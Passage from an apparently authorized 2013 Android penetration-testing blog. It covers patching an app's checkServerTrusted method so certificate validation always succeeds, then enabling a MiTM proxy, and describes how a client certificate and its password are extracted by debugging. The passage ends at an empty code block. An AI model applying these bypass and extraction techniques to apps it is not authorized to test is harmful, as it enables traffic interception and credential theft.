<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Searching the decompiled code revealed an </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> implementation in one of the application’s core security classes. The next step was to patch the code preventing the MiTM and deploy the patched application for testing. The image below shows the two methods implemented for </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwvmhqTGnPZpQ1cq0ZRonG4WwvizWMUjkplyjECEcyatJxlk5IsLL80KQl9HXmI-bW647zOjYDEoFT9gD0Ijai_9B_SDxMX58gJQZkDmE4hGW-7GTRpcmPm26vpTdHPfN4U4Z5jHpkyetS/s1600/check-server-trusted-method.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwvmhqTGnPZpQ1cq0ZRonG4WwvizWMUjkplyjECEcyatJxlk5IsLL80KQl9HXmI-bW647zOjYDEoFT9gD0Ijai_9B_SDxMX58gJQZkDmE4hGW-7GTRpcmPm26vpTdHPfN4U4Z5jHpkyetS/s400/check-server-trusted-method.png" width="400" /></a></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="font-size: x-large;"><span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Patching the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Implementation</span></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The image above shows the implementation of two </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">X509TrustManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> methods, </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkClientTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. It is important to point out that both methods behave in the same way, except that the former is used by client side code and the latter by server side code. If certificate validation fails they throw an exception; otherwise they return </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">void</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, which the caller treats as success.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkClientTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> implementation allows server side code to validate a client certificate. Since this functionality is not required inside the mobile application, the method was empty and simply returned in the test application, which is equivalent to successful validation. However, </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> contained a significant chunk of code performing the custom certificate validation, which I needed to bypass.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">To bypass certificate validation code inside the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method, I replaced its Dalvik code with the code from the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">checkClientTrusted</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method to return void, effectively bypassing the custom certificate check as shown in the image below.</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMoILGTUmPYtJt2Ttjcz8NCDgxnD_RUTaqmDGf0XQYJPrAdV1GAVBOXyRcmLDdGkTLSOFOBZR6vHvLjHheaj_MG5WtqcEsSVwEAHKjVWGOgs3kUglj6maxCSZLf3bIdnHm5_BqrtOBINBp/s1600/check-server-trusted-method-modified.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMoILGTUmPYtJt2Ttjcz8NCDgxnD_RUTaqmDGf0XQYJPrAdV1GAVBOXyRcmLDdGkTLSOFOBZR6vHvLjHheaj_MG5WtqcEsSVwEAHKjVWGOgs3kUglj6maxCSZLf3bIdnHm5_BqrtOBINBp/s400/check-server-trusted-method-modified.png" width="400" /></a></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 21px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: x-large;">Recompiling and Deploying the Modified Application</span></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<span style="font-family: Calibri; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;">Confident that all </span><span style="font-family: 'Courier New'; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="font-family: Calibri; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;"> invocations from this point onwards were going to succeed, I recompiled the application with </span><span style="font-family: 'Courier New'; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;">ApkTool</span><span style="font-family: Calibri; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;">, signed it with </span><span style="font-family: 'Courier New'; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;">SignApk</span><span style="font-family: Calibri; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;"> and deployed it on the device. The web proxy MiTM worked like a charm and I was able to view, modify and fuzz the application traffic.</span></div>
Gursev Singh Kalra (http://www.blogger.com/profile/11125392470187170013), published 2013-10-29T07:51:00.000-07:00, updated 2013-10-29T07:52:13.868-07:00
Debugging Out a Client Certificate from an Android Process<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I had set up my web proxy to intercept the Android application’s traffic and tested the proxy configuration with HTTPS based Android applications; traffic interception worked like a charm. For the application under test, however, things were different. Connections to the application’s server returned an </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HTTP 403</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> error code because SSL mutual authentication was enforced and I did not have the client certificate. The image below shows the error message.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSgCP6u71iLFjtUGJUEnEX7Ew-M_PAnjuh2wsJYjS5ni5954kw9mXExX_ggSqa1fqbiPydE7XNUSP5ABDheEFH3wm3gbTnt3oElmJdhBUxSLbjHvTH1mimoR9Xrx0crz7cbEMxX_5u85hp/s1600/server-403-error.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSgCP6u71iLFjtUGJUEnEX7Ew-M_PAnjuh2wsJYjS5ni5954kw9mXExX_ggSqa1fqbiPydE7XNUSP5ABDheEFH3wm3gbTnt3oElmJdhBUxSLbjHvTH1mimoR9Xrx0crz7cbEMxX_5u85hp/s400/server-403-error.png" width="400" /></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I was in a situation where no meaningful communication could be established with the remote server. The resource files obtained by decompiling the application did not contain the client certificate, so it was clear that it was stored somewhere in the obfuscated code.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and two certificates had already been extracted from the application’s memory, as discussed in the </span><a href="http://gursevkalra.blogspot.com/2013/10/extracting-rsaprivatecrtkey-and.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">previous</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> blog post. As it turned out, those were not sufficient: I still needed the client certificate and its password to be able to connect to the server and test the server side code. This blog post describes how they were retrieved by debugging the application.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: large; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Identifying the Code Using the Client Certificate</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Knowing how Java clients use SSL certificates for client authentication proved critical during this assessment and helped me identify the function calls to look for during the debugging process. The typical steps followed to load a client certificate for an </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> are summarized below:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Create instances of the following classes:</span></div>
</li>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – to communicate with the remote server</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – to hold the client certificate</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManagerFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – to hold the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – to hold the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManager</span></div>
</li>
</ol>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Create a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">File</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance for the client certificate and wrap it inside an </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">InputStream</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Invoke the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance’s </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">load</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method with the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">InputStream</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from step 2 and the certificate password as a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">char[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, so that it now contains the client certificate</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Feed the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManagerFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance with the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from step 3 and the certificate password by invoking its </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">init</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obtain the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManager[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> array from the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManagerFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> created above</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Invoke the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance’s </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">init</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method and feed it the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManager[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from step 5</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obtain a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from the created </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and set up the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance to use it for all SSL communication.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following image depicts the steps discussed:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_lOhDP_qv7Nhou-A3nL1m0K29hrx9xeyQtUoSBHiiTTwwcI1el65I927ppqGw6JfkXJYMks2Ga2fbl3FesrK6zp0ov6qG0WpupkdMfen6vUATpHo3ZJw31g0G_LhjnLCOkSGG7-1qR0CS/s1600/java-client-certificate-support.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="327" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_lOhDP_qv7Nhou-A3nL1m0K29hrx9xeyQtUoSBHiiTTwwcI1el65I927ppqGw6JfkXJYMks2Ga2fbl3FesrK6zp0ov6qG0WpupkdMfen6vUATpHo3ZJw31g0G_LhjnLCOkSGG7-1qR0CS/s400/java-client-certificate-support.jpg" width="400" /></a></div>
<br />
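<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As an added example (not code from the original post or from the application analyzed here), the steps above written out as plain Java. The PKCS#12 stream, its password and the target URL are assumed inputs; where a real application obtains the first two from is exactly what the rest of this post is about.</span></div>

```java
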